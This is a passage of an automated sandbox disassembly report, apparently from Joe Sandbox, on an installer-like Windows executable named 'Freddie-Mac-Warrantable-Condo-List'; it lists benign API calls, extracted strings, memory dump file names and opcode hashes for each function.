GetLastError.KERNEL32(00000000,?,GetLogicalProcessorInformation), ref: 00408BEB

Strings

kernel32.dll, xrefs: 00408BC4
GetLogicalProcessorInformation, xrefs: 00408BBF
@, xrefs: 00408C69

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: AddressErrorHandleLastModuleProc
String ID: @$GetLogicalProcessorInformation$kernel32.dll
API String ID: 4275029093-79381301
Opcode ID: d2b5bb259a4a67909b9857f382d53dc443368d34a06db9e148c60c099e14fc22
Instruction ID: fae384035c4cbf403bb6e842233c038de7d928fc1d1ef8a2a4529768a9174d83
Opcode Fuzzy Hash: d2b5bb259a4a67909b9857f382d53dc443368d34a06db9e148c60c099e14fc22
Instruction Fuzzy Hash: E4117570D05208AEEF10EBA5DA45A6EB7F4DB44704F1084BFE454B72C1DF7D8A548B29

Uniqueness

Uniqueness Score: -1.00%

Function 005CE26C, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 005CE27D

Part of subcall function 004EE238: EnterCriticalSection.KERNEL32(?,00000000,004EE4A7,?,?), ref: 004EE280

SelectObject.GDI32(00000001,00000000), ref: 005CE29F
GetTextExtentPointW.GDI32(00000001,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,?), ref: 005CE2B3
GetTextMetricsW.GDI32(00000001,?,00000000,005CE2F8,?,00000000,?,0068D5D0,00000001), ref: 005CE2D5
ReleaseDC.USER32 ref: 005CE2F2

Strings

ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 005CE2AA

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: Text$CriticalEnterExtentMetricsObjectPointReleaseSectionSelect
String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
API String ID: 1334710084-222967699
Opcode ID: 325bd83ac94b98e0ccaeb91b867b8168358bc3f43770baf6a1d651e33ba30b3f
Instruction ID: 68d2e7468c57547273e36bf030651d7f5f3d68c5ac32077f2b8cb66f1dd3ef54
Opcode Fuzzy Hash: 325bd83ac94b98e0ccaeb91b867b8168358bc3f43770baf6a1d651e33ba30b3f
Instruction Fuzzy Hash: 8E01847AA14204BFE704DEE9CC42F9EB7ECEB49704F510469F604E7280D678AD008724

Uniqueness

Uniqueness Score: -1.00%

Function 006B8141, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 0060F6D8: GetCurrentProcess.KERNEL32(00000028), ref: 0060F6E8
Part of subcall function 0060F6D8: OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0060F6EE

SetForegroundWindow.USER32(?), ref: 006B817A

Strings

Not restarting Windows because Uninstall is being run from the debugger., xrefs: 006B81B1
Restarting Windows., xrefs: 006B8151
(\m, xrefs: 006B8183, 006B8194
bm, xrefs: 006B8147
%hm, xrefs: 006B815B

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: Process$CurrentForegroundOpenTokenWindow
String ID: %hm$(\m$Not restarting Windows because Uninstall is being run from the debugger.$Restarting Windows.$bm
API String ID: 3179053593-36556386
Opcode ID: b7594902ceb65011b7cd408ddb31800c32ac1c1d22a90f0235b323c67c5cc1dc
Instruction ID: d1bb377931262cf507ba46983c8bd46f5a1d5c2f393bef5d4bb5aec732555b7a
Opcode Fuzzy Hash: b7594902ceb65011b7cd408ddb31800c32ac1c1d22a90f0235b323c67c5cc1dc
Instruction Fuzzy Hash: 621130746042049FD700EB69DD86FE837EAAB49304F5540BAF401AB7A2CE79AC82C759

Uniqueness

Uniqueness Score: -1.00%

Function 00409E60, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?,0040707B), ref: 00409E99
WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?), ref: 00409E9F
GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?), ref: 00409EBA
WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?), ref: 00409EC0

Strings

Error, xrefs: 00409ED2
Runtime error at 00000000, xrefs: 00409E92, 00409ED7

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: FileHandleWrite
String ID: Error$Runtime error at 00000000
API String ID: 3320372497-2970929446
Opcode ID: a4deac2aa97ac97823855fef04cac89a22f23a0563f87e50a6800a30aeefe081
Instruction ID: a01582976990e38fcf300ac2ca1e4f1bd102d55210953f65d1fcb3aa769fb624
Opcode Fuzzy Hash: a4deac2aa97ac97823855fef04cac89a22f23a0563f87e50a6800a30aeefe081
Instruction Fuzzy Hash: 52F04FA0A44780BAEB10B7A19C07F7B261AD741B28F10567FB214B91D3C6B85CC49AE9

Uniqueness

Uniqueness Score: -1.00%

Function 0043171C, Relevance: 9.1, APIs: 6, Instructions: 144COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 004317D1
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 004317ED
SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 00431826
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 004318A3
SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 004318BC
VariantCopy.OLEAUT32(?,?), ref: 004318F7

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: ArraySafe$BoundIndex$CopyCreateVariant
String ID:
API String ID: 351091851-0
Opcode ID: 040e7940f355aaa7652d1378d9b08393b08e43244b2170bcb39dc03bfc7fe70c
Instruction ID: ede279f2d9249a03c5eeb803d5e3445196a0ad83b08d93498a0369a0c14e8414
Opcode Fuzzy Hash: 040e7940f355aaa7652d1378d9b08393b08e43244b2170bcb39dc03bfc7fe70c
Instruction Fuzzy Hash: 41512D75A002299FCB62DB59CD81BD9B3FCAF0C304F4455EAE508E7212D634AF858F58

Uniqueness

Uniqueness Score: -1.00%

Function 006AE6F8, Relevance: 9.1, APIs: 6, Instructions: 66COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 006AE714
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,006B78BD,00000000,006B81F9), ref: 006AE743
GetWindowLongW.USER32(?,000000EC), ref: 006AE758
SetWindowLongW.USER32 ref: 006AE77F
ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 006AE798
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 006AE7B9

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: Window$Long$Show
String ID:
API String ID: 3609083571-0
Opcode ID: cbd293cfec67b64efc79bc9d205490811c8f395d7711b658bf93e82dc89e2f59
Instruction ID: c5f2d3f14be40374ea6ae40072baf741f42d7864aa45c80e1917733d0618a2ec
Opcode Fuzzy Hash: cbd293cfec67b64efc79bc9d205490811c8f395d7711b658bf93e82dc89e2f59
Instruction Fuzzy Hash: FC111C75745200AFD700EB68DD81FE237EAAB9E314F4541A5F6158F3E2CA65EC40DB50

Uniqueness

Uniqueness Score: -1.00%

Function 0060D3B4, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 105fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,?,_iu,?,00000000,0060D4F1), ref: 0060D4A1
CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,?,_iu,?,00000000,0060D4F1), ref: 0060D4B1

Strings

_iu, xrefs: 0060D443
Gtk, xrefs: 0060D412, 0060D41D
.tmp, xrefs: 0060D455

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: CloseCreateFileHandle
String ID: .tmp$Gtk$_iu
API String ID: 3498533004-1320520068
Opcode ID: 8f4bd8aeb1207aa4b07bf03847036b0a2b10865cd30baef83bcbefd08e77ff22
Instruction ID: 38fd5bd3aef28e796ac18a57f9f91bd27b67d48edde35eb58a18837c564f9665
Opcode Fuzzy Hash: 8f4bd8aeb1207aa4b07bf03847036b0a2b10865cd30baef83bcbefd08e77ff22
Instruction Fuzzy Hash: 73319030E80209ABDB14EBE4C842BDEBBB5AF54308F118169E904B73D1D738AE458B55

Uniqueness

Uniqueness Score: -1.00%

Function 006B8998, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 102COMMON

Download Yara Rule

APIs

Part of subcall function 005B8250: SetWindowTextW.USER32(?,00000000), ref: 005B8281

ShowWindow.USER32(?,00000005,00000000,006B8C4E,?,?,00000000), ref: 006B89DE

Part of subcall function 005C745C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005C746F

Part of subcall function 00424020: SetCurrentDirectoryW.KERNEL32(00000000,?,006B8A06,00000000,006B8C15,?,?,00000005,00000000,006B8C4E,?,?,00000000), ref: 0042402B

Part of subcall function 005C6FB0: GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,005C7045,?,?,?,00000001,?,0061037E,00000000,006103E9), ref: 005C6FE5

Strings

IMsg, xrefs: 006B8AB2
Uninstall, xrefs: 006B89C4
.msg, xrefs: 006B8A44
.dat, xrefs: 006B8A25

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
String ID: .dat$.msg$IMsg$Uninstall
API String ID: 3312786188-1660910688
Opcode ID: f3279caf476708547096f2985ea174fc674a0b957c50a9dc1f64524f0346753e
Instruction ID: 43941ce92546cf1f75effb4615d96ab71b8b1f254b2d248514a95b56d5af6042
Opcode Fuzzy Hash: f3279caf476708547096f2985ea174fc674a0b957c50a9dc1f64524f0346753e
Instruction Fuzzy Hash: 65415CB0A002059FC700EFA4CD96E9EBBB6FB88304F51846AF400A7751DB75AE41DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 006153AC, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000B06,00000000,00000000), ref: 006153C6
SendMessageW.USER32(00000000,00000B00,00000000,00000000), ref: 00615463

Strings

Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 006153F2
hSa, xrefs: 00615415
Failed to create DebugClientWnd, xrefs: 0061542C

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: MessageSend
String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd$hSa
API String ID: 3850602802-2905362044
Opcode ID: 4e2498dae47c6d0870a5ab4103f59c6443b436741fa29bda88c5ce5a22a9ee1a
Instruction ID: bd2b79d17f40968884fe1c372ced24de8c60c917dea0cb25488337d16b2a65e4
Opcode Fuzzy Hash: 4e2498dae47c6d0870a5ab4103f59c6443b436741fa29bda88c5ce5a22a9ee1a
Instruction Fuzzy Hash: 391123B1A403129FE300EB28DC81FDABBD69F94304F08002AF5858B3D2D3749C84C766

Uniqueness

Uniqueness Score: -1.00%

Function 00624AA4, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

MsgWaitForMultipleObjects.USER32 ref: 00624AD6
GetExitCodeProcess.KERNEL32 ref: 00624AF9
CloseHandle.KERNEL32(?,00624B2C,00000001,00000000,000000FF,000004FF,00000000,00624B25), ref: 00624B1F

Strings

MsgWaitForMultipleObjects, xrefs: 00624AE5
GetExitCodeProcess, xrefs: 00624B02

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: CloseCodeExitHandleMultipleObjectsProcessWait
String ID: GetExitCodeProcess$MsgWaitForMultipleObjects
API String ID: 2573145106-3235461205
Opcode ID: 5a47b888b64c9d71a21df3ce652ab4a6790a840d61fbcb63caf85f52caaf36c3
Instruction ID: b445045a4a45572890d55b61ba1fda7f57045845c9b5a3357f52015174d7dfc9
Opcode Fuzzy Hash: 5a47b888b64c9d71a21df3ce652ab4a6790a840d61fbcb63caf85f52caaf36c3
Instruction Fuzzy Hash: CE01A234640605AFD710EFA8ED62E9977EAEB49721F200265F520D73D0DE74ED44CA19

Uniqueness

Uniqueness Score: -1.00%

Function 004070B0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00000105,?), ref: 004070E7
SetCurrentDirectoryW.KERNEL32(?,00000105,?), ref: 004070ED
GetCurrentDirectoryW.KERNEL32(00000105,?), ref: 004070FC
SetCurrentDirectoryW.KERNEL32(?,00000105,?), ref: 0040710D

Strings

:, xrefs: 004070CC

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: CurrentDirectory
String ID: :
API String ID: 1611563598-336475711
Opcode ID: aa9707b4d0d9c5d03511b22bbefae7383822b12ede650e628390a7387f8948e9
Instruction ID: 4e46778bef482c884a40b6a77bd37b1cdf5980326a29a022de95e28d89e8e0a5
Opcode Fuzzy Hash: aa9707b4d0d9c5d03511b22bbefae7383822b12ede650e628390a7387f8948e9
Instruction Fuzzy Hash: 71F0627154474465D310E7658852BDB729CDF84348F04843E76C89B2D1E6BC5948979B

Uniqueness

Uniqueness Score: -1.00%

Function 0059BDE0, Relevance: 7.6, APIs: 5, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad8bebb6b70c684c30d9747228a5e3f8ffc0963a0edfe972ae4d2d3d4fc87c04
Instruction ID: f6f51fa323c2004b4ed4a12cf3aa4c02228d8e81e9c13bd86265522dc6499af0
Opcode Fuzzy Hash: ad8bebb6b70c684c30d9747228a5e3f8ffc0963a0edfe972ae4d2d3d4fc87c04
Instruction Fuzzy Hash: B01172A160425956FF706A7A6F09BEA3F9C7FD1745F050429BE419B283CB38CC458BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00423A20, Relevance: 7.5, APIs: 5, Instructions: 41fileCOMMON

Download Yara Rule

APIs

